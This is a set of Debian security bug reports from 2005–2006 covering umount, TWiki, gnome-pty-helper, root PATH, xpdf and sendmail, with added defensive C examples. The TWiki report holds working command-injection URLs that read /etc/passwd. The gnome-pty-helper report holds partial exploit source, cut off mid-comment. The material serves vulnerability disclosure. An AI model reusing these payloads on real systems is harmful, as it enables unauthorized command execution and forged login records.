Bug#328141: mount: umount -r drops nosuid flag

2005-09-13 Thread Paul Szabo
Package: mount
Version: 2.11n-7
Severity: critical
File: /bin/umount
Tags: security
Justification: root security hole


Please see

  http://www.securityfocus.com/archive/1/410333

for details. Verified (that noexec flag is gone) as follows:

psz:~$ id
uid=1001(psz) gid=1001(amstaff) groups=1001(amstaff),24(cdrom),25(floppy)
psz:~$ grep cdrom /etc/fstab
/dev/cdrom  /cdrom  iso9660 ro,user,noauto  0   0
psz:~$ /bin/mount /cdrom
psz:~$ /bin/mount | grep cdrom
/dev/cdrom on /cdrom type iso9660 (ro,noexec,nosuid,nodev,user=psz)
psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin
bash: /cdrom/ML3/ML_30_013_Linuxi.bin: /bin/sh: bad interpreter: Permission denied
psz:~$ cd /cdrom
psz:/cdrom$ /bin/umount -r /cdrom
umount: /dev/cdrom busy - remounted read-only
psz:/cdrom$ cd
psz:~$ /bin/mount | grep cdrom
/dev/cdrom on /cdrom type iso9660 (ro)
psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin
Unpacking to /tmp/ML.tar...
[ctrl-C]
psz:~$ /bin/umount -r /cdrom
psz:~$ 


-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.27-smssvr1.6 #1 SMP Wed Aug 24 12:16:31 EST 2005 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages mount depends on:
ii  libc6         2.2.5-11.8  GNU C Library: Shared libraries an



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

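
What the transcript above shows, at the mount(2) level, as an added example in C (not util-linux code, and not the fix Debian later shipped): the remount-read-only fallback that umount -r performs passes mount(2) a flags word built from MS_REMOUNT|MS_RDONLY and nothing else (util-linux's own call is not on this page, so that call shape is an assumption here), and on a remount the kernel takes the mount's nosuid/nodev/noexec bits from that argument, so whatever is omitted is cleared. The fixed variant reads the flags the mount currently has and carries them across. The /proc/mounts excerpt is constructed to mirror the report's mount line; parse_mount_options, current_mount_flags and the two remount_ro_flags_* functions are this example's own names.

```c
/* Added example, not util-linux code: why a remount-read-only that passes only
 * MS_RDONLY loses nosuid/nodev/noexec, and what a safe "umount -r" must pass.
 * Assumes Linux mount(2) semantics: on MS_REMOUNT the kernel takes the mount's
 * restriction flags from the flags argument, so anything omitted is cleared. */
#include <stdio.h>
#include <string.h>
#include <sys/mount.h>

#define RESTRICTIONS (MS_NOSUID | MS_NODEV | MS_NOEXEC)

/* One /proc/mounts or mtab option token -> MS_* flag (0 for options that are
 * not kernel flags, e.g. the mtab-only "user=psz"). */
static unsigned long option_to_flag(const char *opt)
{
    if (strcmp(opt, "ro") == 0)     return MS_RDONLY;
    if (strcmp(opt, "nosuid") == 0) return MS_NOSUID;
    if (strcmp(opt, "nodev") == 0)  return MS_NODEV;
    if (strcmp(opt, "noexec") == 0) return MS_NOEXEC;
    return 0;
}

/* "ro,noexec,nosuid,nodev,user=psz" -> MS_RDONLY|MS_NOEXEC|MS_NOSUID|MS_NODEV */
unsigned long parse_mount_options(const char *opts)
{
    char buf[256];
    unsigned long flags = 0;
    char *tok;

    snprintf(buf, sizeof buf, "%s", opts);
    for (tok = strtok(buf, ","); tok != NULL; tok = strtok(NULL, ","))
        flags |= option_to_flag(tok);
    return flags;
}

/* Find MOUNTPOINT in text in /proc/mounts format ("dev mnt type opts dump pass",
 * one mount per line) and return its option flags, or (unsigned long)-1 if the
 * mount point is not listed. */
unsigned long current_mount_flags(const char *procmounts, const char *mountpoint)
{
    const char *line = procmounts;

    while (*line != '\0') {
        char linebuf[512], dev[128], mnt[128], type[64], opts[256];
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);

        if (len >= sizeof linebuf)
            len = sizeof linebuf - 1;
        memcpy(linebuf, line, len);
        linebuf[len] = '\0';

        if (sscanf(linebuf, "%127s %127s %63s %255s", dev, mnt, type, opts) == 4
            && strcmp(mnt, mountpoint) == 0)
            return parse_mount_options(opts);

        if (nl == NULL)
            break;
        line = nl + 1;
    }
    return (unsigned long)-1;
}

/* The behaviour the report demonstrates: remount with nothing but MS_RDONLY,
 * so the restriction flags the user mount had are dropped. */
unsigned long remount_ro_flags_buggy(unsigned long current)
{
    (void)current;               /* ignored: that is the bug */
    return MS_REMOUNT | MS_RDONLY;
}

/* Safe variant: take the flags the mount currently has and carry them across. */
unsigned long remount_ro_flags_fixed(unsigned long current)
{
    return MS_REMOUNT | MS_RDONLY | (current & RESTRICTIONS);
}

int main(void)
{
    /* Constructed /proc/mounts excerpt mirroring the report's mount line. */
    const char *sample =
        "/dev/hda1 / ext3 rw 0 0\n"
        "/dev/cdrom /cdrom iso9660 ro,noexec,nosuid,nodev,user=psz 0 0\n";
    unsigned long cur = current_mount_flags(sample, "/cdrom");
    unsigned long buggy = remount_ro_flags_buggy(cur);
    unsigned long fixed = remount_ro_flags_fixed(cur);

    printf("current flags:        %#lx\n", cur);
    printf("buggy umount -r passes %#lx, restrictions kept: %s\n", buggy,
           (buggy & RESTRICTIONS) == (cur & RESTRICTIONS) ? "yes" : "no");
    printf("fixed umount -r passes %#lx, restrictions kept: %s\n", fixed,
           (fixed & RESTRICTIONS) == (cur & RESTRICTIONS) ? "yes" : "no");
    /* A real umount -r would now call mount("/dev/cdrom", "/cdrom", NULL,
     * fixed, NULL), which needs root; it is not done here. */
    return 0;
}
```

The "current" flags have to come from somewhere the unprivileged user cannot forge: /proc/mounts is kernel-supplied, whereas /etc/mtab is a file that mount itself writes, and the kernel rather than mtab is what the remount semantics are defined against.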


Bug#328557: twiki: TWiki Remote Command Execution Vulnerability

2005-09-15 Thread Paul Szabo
Package: twiki
Version: 20030201-6
Severity: critical
Justification: root security hole



Please see

  http://www.securityfocus.com/archive/1/410721

Verified with

  http://iw/iw/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
  http://iw/iw/view/Main/TWikiUsers?rev=2%20%7Cps%20aux|cat%20--%20-%20

that it allows access as www-data, the apache user.


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spb0.3
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages twiki depends on:
ii  apache-common              1.3.33-6sarge1  support files for all Apache webse
ii  debconf                    1.4.30.13       Debian configuration management sy
ii  libalgorithm-diff-perl     1.19.01-1       a perl library for finding Longest
ii  libdigest-sha1-perl        2.10-1          NIST SHA-1 message digest algorith
ii  perl [libmime-base64-perl  5.8.4-8         Larry Wall's Practical Extraction 
ii  perl-modules [libnet-perl  5.8.4-8         Core Perl modules
ii  rcs                        5.7-15          The GNU Revision Control System

-- debconf information:
* twiki/apacheUserCreationNote:
* twiki/samplefiles: true
* twiki/wikiwebmaster: [EMAIL PROTECTED]
* twiki/defaultUrlHost: http://iw.maths.usyd.edu.au





Bug#328557: twiki: TWiki Remote Command Execution Vulnerability

2005-09-16 Thread Paul Szabo
Sven,

> why are you running a totally outdated twiki package?

Because I am an idiot, with a badly mis-configured APT!
(That I inherited this machine recently is no excuse.)
Thanks for putting me on the right path: now all fixed.

Sorry about the wasted bandwidth. Please close this bug.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole


gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


OUTPUT:

[EMAIL PROTECTED]:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz      pts/2        Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz      pts/2        Sep 20 08:40 (xyz)
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
psz      31358  0.0  0.3 10340 7768 ?        S    08:14   0:00 xterm -T [EMAIL PROTECTED] -n [EMAIL PROTECTED] -sb -sl 1 -ls
psz      31444  0.0  0.0  1484  380 pts/1    S    08:21   0:00 gnome-pty-helper-exploit xyz
psz      31446  0.0  0.0  1696  604 pts/1    S    08:21   0:00 gnome-pty-helper
psz      31454  0.0  0.0  2496  848 pts/1    R+   08:21   0:00 ps aux
[1]+  Done                    gnome-pty-helper-exploit xyz
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)


CODE:

/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code "stolen" from subshell.c .
*/

/* The header names between the angle brackets did not survive the archive;
   these are the ones this file needs (malloc, fork, dup2, execl, close). */
#include <stdlib.h>
#include <unistd.h>

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG  4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol  [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

/* Header names restored as above: recvmsg/iovec/cmsghdr for fd passing. */
#include <sys/socket.h>
#include <sys/uio.h>

static struct cmsghdr *cmptr;
#define CONTROLLEN  sizeof (struct cmsghdr) + sizeof (int)

/* Receive one file descriptor that the helper passes back over the
   fd-passing socket as SCM_RIGHTS ancillary data. */
static int
receive_fd (int helper_fd)
{
        struct iovec iov [1];
        struct msghdr msg;
        char buf [32];

        iov [0].iov_base = buf;
        iov [0].iov_len  = sizeof (buf);
        msg.msg_iov  = iov;
        msg.msg_iovlen   = 1;
        msg.msg_name = NULL;
        msg.msg_namelen  = 0;

        if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
                return -1;
        msg.msg_control = (caddr_t) cmptr;
        msg.msg_controllen = CONTROLLEN;

        if (recvmsg (helper_fd, &msg, 0) <= 0)
                return -1;

        return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
        return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

/* Spawn the setuid helper (once) with the protocol socket on its stdin and
   the fd-passing socket on its stdout, exactly as libzvt does.  The helper
   inherits our environment, DISPLAY included; that inherited, unchecked
   DISPLAY is what ends up in the utmp host field. */
static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
        GnomePtyOps op;
        int result, n;
        void *tag;

        if (helper_pid == -1)
                return NULL;

        if (helper_pid == 0){
                if (s_pipe (helper_socket_protocol) == -1)
                        return NULL;

                if (s_pipe (helper_socket_fdpassing) == -1){
                        close (helper_socket_protocol [0]);
                        close (helper_socket_protocol [1]);
                        return NULL;
                }

                helper_pid = fork ();

                if (helper_pid == -1){
                        close (helper_socket_protocol [0]);
                        close (helper_socket_protocol [1]);
                        close (helper_socket_fdpassing [0]);
                        close (helper_socket_fdpassing [1]);
                        return NULL;
                }

                if (helper_pid == 0){
                        close (0);
                        close (1);
                        dup2 (helper_socket_protocol  [1], 0);
                        dup2 (helper_socket_fdpassing [1], 1);

                        /* Close aliases */
                        close (helper_socket_protocol  [0]);
                        close (helper_socket_protocol  [1]);
                        close (helper_socket_fdpassing [0]);
                        close (helper_socket_fdpassing [1]);

                        execl ("/usr/sbin/gnome-pty-helper",
                               "gnome-pty-helper", NULL);
                        exit (1);
                } else {
                        close (helper_socket_fdpassing [1]);
                        close (helper_socket_protocol  [1]);

                        /*
                         * Set the close-on-exec flag for the other
                         * descriptors, these should never propagate
                         * (otherwise gnome-pty-helper won't notice when
                         * this process is killed)

Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-19 Thread Paul Szabo
Steve,

>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical?  What is the attack vector here
> which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-pty-helper.)

Cheers, Paul

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo
Dear Loic,

>  Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am I sure if this is serious
enough to deserve one.)

>  Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

>  Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

2005-09-26 Thread Paul Szabo
Dear Loic,

>> >  Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 equivalent of libzvt2 ...
> It'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too.  Let me know if you don't have a setup
> permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs 
display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



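
One way to do the sanity check that the thread says is missing, as an added example in C (not gnome-pty-helper or libvte code): display_is_sane accepts only strings of the form host:display[.screen] that fit ut_host, and fill_utmp_checked refuses anything else, shown next to the unchecked copy the report describes. The function names and the test inputs are this example's own; it fills a struct utmp in memory only and writes nothing to /var/run/utmp. The caveat stands: syntax says nothing about whether the caller actually owns that display, which is the authorisation question behind the "run xhost" idea above.

```c
/* Added example, not gnome-pty-helper or libvte code: the sanity check the
 * helper could apply to DISPLAY before copying it into ut_host, next to the
 * unchecked copy the report describes.  A syntax check only bounds what an
 * unprivileged caller can write; it does not prove the caller owns that
 * display.  Assumes glibc's <utmp.h> layout (UT_HOSTSIZE, USER_PROCESS). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <utmp.h>

/* Accept only "[host]:display[.screen]": host from [A-Za-z0-9.-] (hostnames
 * and IPv4 literals; bracketed IPv6 is not handled), display and screen
 * decimal, no control or space characters, and short enough to fit ut_host
 * with a terminator.  ":0" and "y622.yt.maths.usyd.edu.au:0.0" pass;
 * "xyz", "", "a b:0", ":0.x" and "host:" fail. */
int display_is_sane(const char *d)
{
    size_t n = strlen(d);
    const char *colon = strchr(d, ':');
    const char *p;

    if (n == 0 || n >= UT_HOSTSIZE || colon == NULL)
        return 0;
    for (p = d; p < colon; p++)
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != '-')
            return 0;
    p = colon + 1;
    if (!isdigit((unsigned char)*p))
        return 0;
    while (isdigit((unsigned char)*p))
        p++;
    if (*p == '.') {
        p++;
        if (!isdigit((unsigned char)*p))
            return 0;
        while (isdigit((unsigned char)*p))
            p++;
    }
    return *p == '\0';
}

/* The pattern the report describes: whatever DISPLAY the (unprivileged)
 * caller put in the helper's environment lands in ut_host unexamined. */
void fill_utmp_unchecked(struct utmp *ut, const char *user, const char *line,
                         const char *display)
{
    memset(ut, 0, sizeof *ut);
    ut->ut_type = USER_PROCESS;
    snprintf(ut->ut_user, sizeof ut->ut_user, "%s", user);
    snprintf(ut->ut_line, sizeof ut->ut_line, "%s", line);
    snprintf(ut->ut_host, sizeof ut->ut_host, "%s", display);
}

/* Checked variant: refuse (return -1) rather than record a host string that
 * is not an X display.  Nothing here touches /var/run/utmp. */
int fill_utmp_checked(struct utmp *ut, const char *user, const char *line,
                      const char *display)
{
    if (!display_is_sane(display))
        return -1;
    fill_utmp_unchecked(ut, user, line, display);
    return 0;
}

/* Would this DISPLAY be recorded by the checked path?  1 = yes, 0 = refused. */
int display_would_be_recorded(const char *display)
{
    struct utmp ut;
    return fill_utmp_checked(&ut, "psz", "pts/2", display) == 0;
}

int main(void)
{
    /* Constructed inputs: the report's bogus "xyz", a genuine display, and
     * two malformed strings. */
    const char *tests[] = { "xyz", "y622.yt.maths.usyd.edu.au:0.0", ":0", "a b:0" };
    size_t i;

    for (i = 0; i < sizeof tests / sizeof tests[0]; i++)
        printf("%-32s -> %s\n", tests[i],
               display_would_be_recorded(tests[i]) ? "recorded" : "rejected");
    return 0;
}
```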


Bug#328141: acknowledged by developer (Bug#329063: fixed in util-linux 2.12p-8)

2005-09-26 Thread Paul Szabo
Dear Debian Security,

Quoting from  http://www.debian.org/security/ :

  Debian takes security very seriously. Most security problems
  brought to our attention are corrected within 48 hours.

Can we please have a DSA for this problem?

Thanks,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#329156: gnome-pty-helper foo

2005-10-07 Thread Paul Szabo
Joey,

> Could somebody explain the security implication for me?
>
> being able to write arbitrary strings into valid records without
> overwriting any other data in utmp/wtmp can hardly be classified
> as a security vulnerability.

It depends on what trust you place in the correctness of utmp/wtmp. Knowing
that records are often left behind (not cleaned up or closed), you may have
grown to regard them as useless data. However in that case they should be
abandoned: getting rid of many setuid/setgid objects, improving security.
(Records left behind may be regarded as a security issue: how do you know
when all users are off and it is "safe" to reboot?)

Some people would like to rely on utmp/wtmp correctness. If I see user X
doing something funny: do I run to office A or office B? Some academics
(foolishly?) like to allocate "participation marks" (attendance records) to
students in their tutorial: based on utmp/wtmp, that is surely useless.
When allowing users access to USB sticks on their "thin client" terminals,
how do I know if they "own" (are logged in to) that particular terminal:
run xhost and check return status, wasting resources...

As I commented elsewhere, I do not think any Debian utilities ever use
utmp/wtmp. Are you then at freedom to abandon them?

Viewed another way: users are not meant to be able to write fake utmp/wtmp
records. But they can. Anything that users can do, without authority, is a
security issue. Any unexpected behaviour is a potential security issue.

> (Apart from that, I'm only slightly annoyed as I had to learn about
> this via MITRE / GNOME Bugzilla instead of a mail from the maintainer
> to the security team?)

Would I have been allowed to contact the security team directly? Are not
all security-tagged bug reports monitored, as a matter of course? (Are they
knowledgeable to advise on your questions above?)

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#299007: base-files: Insecure PATH in /root/.profile

2005-03-10 Thread Paul Szabo
Package: base-files
Version: 3.0.2
Severity: critical
Tags: patch security
Justification: root security hole


I recently noticed that /usr/local and /usr/local/{bin,sbin} are
group-writable and owned by root:staff. This is wrong: those directories
are in the default PATH for root. They (and files within) should be
root-owned: group staff users or become-any-user-but-root bugs should not
be able to trojan and thus get root.

The Debian Policy Manual [1] says:

  ... /usr/local take precedence over the equivalents in /usr.
  ... should have permissions 2775 and be owned by root.staff.

but it [2] also says:

  ... make sure that [it] is secure ...
  Files should be owned by root.root ... mode 644 or 755.
  Directories should be mode 755 or 2775 ... owned by the group that needs
  write access to it.

The Debian Reference [3] and Securing Debian Manual [4], [5] say

  [group] staff is ... for helpdesk types or junior sysadmins ... to do
  things in /usr/local and to create directories in /home.

  [group] staff: Allows users to add local modifications to the system
  (/usr/local, /home) without needing root privileges.

  The 'staff' group are usually help-desk/junior sysadmins, allowing them
  to work in /usr/local and create directories in /home. 

(This is surely wrong, seems a SysV left-over: you need root privileges to
chown user directories in /home or in fact to create users in /etc/passwd.)

"Junior sysadmins" should not be able or encouraged to trojan root, even if
you trust them with the root password or give them sudo privileges.

Become-any-user-but-root and become-any-group-but-root bugs are quite
common. When a group of machines share user home directories via NFS
exported from somewhere with default root-squash, getting root on one
machine gives precisely that on all others of the group. There have been
"genuine" such bugs also e.g. in sendmail [6].

This security lapse has been discussed before [7], [8].

The solution is to remove /usr/local things from the default PATH in
/root/.profile (i.e. in /usr/share/base-files/dot.profile), leaving a
warning comment instead.

It would also be good to re-word the confused policy, and to make
/usr/local root-owned. (Maybe /usr/local/sbin could then be used again.)
Discuss on debian-policy@lists.debian.org, or "reportbug debian-policy"?

References:

[1] http://www.debian.org/doc/debian-policy/ch-opersys.html#s9.1.2
[2] http://www.debian.org/doc/debian-policy/ch-files.html#s10.9
[3] http://www.debian.org/doc/manuals/reference/ch-tune.en.html#s9.2.3
[4] http://www.debian.org/doc/manuals/securing-debian-howto/ch11.en.html#s11.1.12.1
[5] http://www.debian.org/doc/manuals/securing-debian-howto/ch11.en.html#s11.1.12.2
[6] http://hackersplayground.org/papers/sendmailholes.txt
[7] http://lists.debian.org/debian-doc/2001/08/msg00041.html
[8] http://lists.debian.org/debian-user/2003/12/msg02057.html

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages base-files depends on:
ii  base-passwd   3.4.1      Debian Base System Password/Group 
ii  gawk [awk]    1:3.1.0-3  GNU awk, a pattern scanning and pr
ii  mawk [awk]    1.3.3-8    a pattern scanning and text proces




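
A check a practitioner would want for the PATH problem described above, as an added example in C (not base-files code): audit_path_dir reports, for one directory, whether it is root-owned and whether its mode has g+w or o+w, and count_writable_path_dirs walks a PATH string and counts the entries a group-staff user (or a become-any-gid-but-root bug) could plant a binary in. demo_audit creates two scratch directories under /tmp, one 0755 and one 2775 (the /usr/local mode policy prescribed), which is an assumption about the host; the PATHDIR_* names are this example's own.

```c
/* Added example, not base-files code: audit the directories in a PATH for the
 * trojaning conditions the report describes (root:staff 2775, or any directory
 * a non-root group or everyone can write).  Assumes POSIX stat(2)/mkdir(2) and
 * a writable /tmp for the demonstration; the PATHDIR_* names are this
 * example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

enum {
    PATHDIR_MISSING        = 1,   /* no such directory */
    PATHDIR_NOT_ROOT_OWNED = 2,   /* owner uid != 0 */
    PATHDIR_GROUP_WRITABLE = 4,   /* g+w, e.g. 2775 root:staff */
    PATHDIR_WORLD_WRITABLE = 8    /* o+w, e.g. /tmp */
};
#define PATHDIR_WRITABLE (PATHDIR_GROUP_WRITABLE | PATHDIR_WORLD_WRITABLE)

/* Bitmask of problems for one directory. */
int audit_path_dir(const char *dir)
{
    struct stat st;
    int problems = 0;

    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return PATHDIR_MISSING;
    if (st.st_uid != 0)
        problems |= PATHDIR_NOT_ROOT_OWNED;
    if (st.st_mode & S_IWGRP)
        problems |= PATHDIR_GROUP_WRITABLE;
    if (st.st_mode & S_IWOTH)
        problems |= PATHDIR_WORLD_WRITABLE;
    return problems;
}

/* Number of PATH entries a non-root user (or a become-any-gid-but-root bug)
 * could plant a binary in.  An empty entry means the current directory and is
 * always counted; a missing directory is skipped here (see the note below
 * about writable parents).  Offenders go to REPORT when it is non-NULL. */
int count_writable_path_dirs(const char *path, FILE *report)
{
    char entry[1024];
    const char *start = path;
    int n = 0;

    for (;;) {
        const char *end = strchr(start, ':');
        size_t len = end ? (size_t)(end - start) : strlen(start);
        int pr = 0, writable;

        if (len >= sizeof entry)
            len = sizeof entry - 1;
        memcpy(entry, start, len);
        entry[len] = '\0';

        if (len == 0)
            writable = 1;
        else if ((pr = audit_path_dir(entry)) == PATHDIR_MISSING)
            writable = 0;
        else
            writable = (pr & PATHDIR_WRITABLE) != 0;

        if (writable) {
            n++;
            if (report)
                fprintf(report, "writable PATH entry '%s' (problems %#x)\n",
                        entry, pr);
        }
        if (end == NULL)
            break;
        start = end + 1;
    }
    return n;
}

/* Self-contained demonstration: a 0755 directory, a 2775 one (the mode policy
 * gave /usr/local) and a missing entry.  Returns the count, 1 (only the 2775
 * directory), or -1 if the scratch directories cannot be created. */
int demo_audit(void)
{
    char safe[64], staff[64], path[256];
    long pid = (long)getpid();
    int n;

    snprintf(safe,  sizeof safe,  "/tmp/pathaudit-safe-%ld", pid);
    snprintf(staff, sizeof staff, "/tmp/pathaudit-staff-%ld", pid);
    if (mkdir(safe, 0755) != 0 || chmod(safe, 0755) != 0)
        return -1;
    if (mkdir(staff, 0755) != 0 || chmod(staff, 02775) != 0) {
        rmdir(safe);
        return -1;
    }
    snprintf(path, sizeof path, "%s:%s:/nonexistent-%ld", staff, safe, pid);
    n = count_writable_path_dirs(path, NULL);
    rmdir(staff);
    rmdir(safe);
    return n;
}

int main(void)
{
    const char *path = getenv("PATH");

    printf("demo PATH: %d writable entries\n", demo_audit());
    printf("this process's PATH: %d writable entries\n",
           count_writable_path_dirs(path ? path : "", stdout));
    return 0;
}
```

Two things the audit deliberately leaves out: a missing entry such as /usr/local/sbin whose parent is writable, which anyone with write access to the parent can create and fill; and the parents of existing entries, which let an attacker rename a directory out of the way and substitute their own. Both need the same stat-based check applied up the path.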


Bug#342281: xpdf-reader: security issues by iDefense

2005-12-06 Thread Paul Szabo
Package: xpdf-reader
Version: 3.00-13
Severity: critical
Justification: causes serious data loss



Arbitrary code execution (with privileges as user of package) issues
reported by iDefense:

  Multiple Vendor xpdf DCTStream Baseline Heap Overflow Vulnerability
  Multiple Vendor xpdf DCTStream Progressive Heap Overflow
  Multiple Vendor xpdf StreamPredictor Heap Overflow Vulnerability
  Multiple Vendor xpdf JPX Stream Reader Heap Overflow Vulnerability

  http://www.idefense.com/application/poi/display?id=342
  http://www.idefense.com/application/poi/display?id=343
  http://www.idefense.com/application/poi/display?id=344
  http://www.idefense.com/application/poi/display?id=345

(Debian, both woody and sarge, is specifically mentioned as vulnerable.)
Reported also on public mailing lists, see
http://lists.grok.org.uk/pipermail/full-disclosure/2005-December/
http://www.securityfocus.com/archive/1

Upstream/vendor patches are apparently available.

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm0.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages xpdf-reader depends on:
ii  gsfonts        8.14+v8.11+urw-0.2     Fonts for the Ghostscript interpre
ii  lesstif2       1:0.93.94-11.4         OSF/Motif 2.1 implementation relea
ii  libc6          2.3.2.ds1-22           GNU C Library: Shared libraries an
ii  libfreetype6   2.1.7-2.4              FreeType 2 font engine, shared lib
ii  libgcc1        1:3.4.3-13             GCC support library
ii  libice6        4.3.0.dfsg.1-14sarge1  Inter-Client Exchange library
ii  libpaper1      1.1.14-3               Library for handling paper charact
ii  libsm6         4.3.0.dfsg.1-14sarge1  X Window System Session Management
ii  libstdc++5     1:3.3.5-13             The GNU Standard C++ Library v3
ii  libt1-5        5.0.2-3                Type 1 font rasterizer library - r
ii  libx11-6       4.3.0.dfsg.1-14sarge1  X Window System protocol client li
ii  libxext6       4.3.0.dfsg.1-14sarge1  X Window System miscellaneous exte
ii  libxp6         4.3.0.dfsg.1-14sarge1  X Window System printing extension
ii  libxpm4        4.3.0.dfsg.1-14sarge1  X pixmap library
ii  libxt6         4.3.0.dfsg.1-14sarge1  X Toolkit Intrinsics
ii  xlibs          4.3.0.dfsg.1-14sarge1  X Keyboard Extension (XKB) configu
ii  xpdf-common    3.00-13                Portable Document Format (PDF) sui
ii  zlib1g         1:1.2.2-4.sarge.2      compression library - runtime

-- no debconf information





Bug#358440: sendmail: race, exec arbitrary, fixed 8.13.6

2006-03-22 Thread Paul Szabo
Package: sendmail
Version: 8.13.4-3
Severity: critical
Justification: root security hole


Please see the following advisories/reports:

  http://www.auscert.org.au/6148
  http://xforce.iss.net/xforce/alerts/id/216
  http://www.sendmail.org/8.13.6.html

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- Package-specific info:
Output of /usr/share/bug/sendmail/script:

ls -alR /etc/mail:
/etc/mail:
total 272
drwxr-sr-x   7 smmta smmsp  4096 Dec  2 09:22 .
drwxr-xr-x  91 root  root   8192 Mar 20 22:47 ..
-rwxr-xr--   1 root  smmsp  9116 Dec  2 09:21 Makefile
-rw-------   1 root  root   4211 Dec  2 09:22 access
-rw-r-----   1 smmta smmsp 12288 Dec  2 09:22 access.db
-rw-r--r--   1 root  root    281 Jun  4  2005 address.resolve
lrwxrwxrwx   1 root  smmsp    10 Dec  2 09:22 aliases -> ../aliases
-rw-r-----   1 smmta smmsp 12288 Dec  2 09:22 aliases.db
-rw-r--r--   1 root  root   3058 Dec  2 09:21 databases
-rw-r--r--   1 root  root   5588 Jun  4  2005 helpfile
-rw-r--r--   1 root  smmsp    35 Dec  2 09:22 local-host-names
drwxr-sr-x   2 smmta smmsp  4096 Dec  2 09:21 m4
